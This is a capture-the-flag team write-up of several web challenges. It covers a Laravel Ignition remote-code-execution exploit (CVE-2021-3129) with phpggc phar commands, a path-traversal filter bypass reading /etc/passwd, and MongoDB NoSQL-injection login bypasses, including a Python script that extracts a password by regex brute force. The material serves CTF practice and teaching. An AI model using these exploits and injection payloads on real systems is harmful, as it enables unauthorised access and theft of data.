Web

Inspector gadget

Solved by: Bobby sox and ava

us3full_1nf0rm4tion}
1. CHTB{
2. us3full_1nf0rm4tion}
3. c4n_r3ve4l_ 

Cass

Solved by : thewhiteh4t


DAAS

Solved by: Nigamelastic

CVE-2021-3129 : https://nvd.nist.gov/vuln/detail/CVE-2021-3129

ip/_ignition/execute-solution

the idea is to get the phar file with ur custom command from 1st repo and then put the phar file into the exploit with specified url to run the exploit PS: for a linux command with spaces simply use "

flagM1AhS
php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /flagM1AhS"
./laravel-ignition-rce.py http://165.227.234.7:31636/ /tmp/exploit.phar
CHTB{wh3n_7h3_d3bu663r_7urn5_4641n57_7h3_d3bu6633}

MiniSTRyplace

Solved by: Bobbysox and thewhiteh4t

$language = str_replace('../', '', $_GET['language']);
http://46.101.77.180:32490/?lang=....//....//....//....//....//....//....//....//etc/passwd
http://165.227.234.7:30779/?lang=....//....//flag

Wild Goose Hunt

Solved by : thewhiteh4t

    #!/bin/ash
    
    # Secure entrypoint
    chmod 600 /entrypoint.sh
    mkdir /tmp/mongodb
    mongod --noauth --dbpath /tmp/mongodb/ &
    sleep 2
    mongo heros --eval "db.createCollection('users')"
    mongo heros --eval 'db.users.insert( { username: "admin", password: "CHTB{f4k3_fl4g_f0r_t3st1ng}"} )'
    /usr/bin/supervisord -c /etc/supervisord.conf

username[$ne]=lol&password[$ne]=lol

username=admin&password[$regex]=A*

username=admin&password[$regex]=CHTB{.*

    #!/usr/bin/env python3
    #################################
    ## Author    : thewhiteh4t ######
    ## Challenge : Wild Goose Hunt ##
    #################################
    import json
    import requests
    ip = '138.68.187.25'
    port = 31370
    url = f'http://{ip}:{port}/api/login'
    flag = 'CHTB{'
    charset = '_01234abcdefghijklmnopqrstuvwxyz'
    loop_iter = 1
    while flag.endswith('}') == False:
        for char in charset:
            if loop_iter == 1:
                payload = flag + char + '.*'
            else:
                payload = flag + '}'
            data = {
                'username': 'admin',
                'password[$regex]': payload
            }
            try:
                rqst = requests.post(url, data=data)
            except Exception as e:
                print(f'[-] Exception : {e}')
                exit()
            if rqst.status_code == 200:
                resp = rqst.text
                json_resp = json.loads(resp)
                status = json_resp['logged']
                if status == 1:
                    if payload.endswith('}') == False:
                        flag = payload.replace('.*', '')
                    else:
                        flag = payload
                        print(f'FLAG : {flag}')
                        exit()
                    print(f'FLAG : {flag}')
                    loop_iter = 0
                    break
            else:
                print(f'[-] Error : {rqst.status_code}')
        loop_iter += 1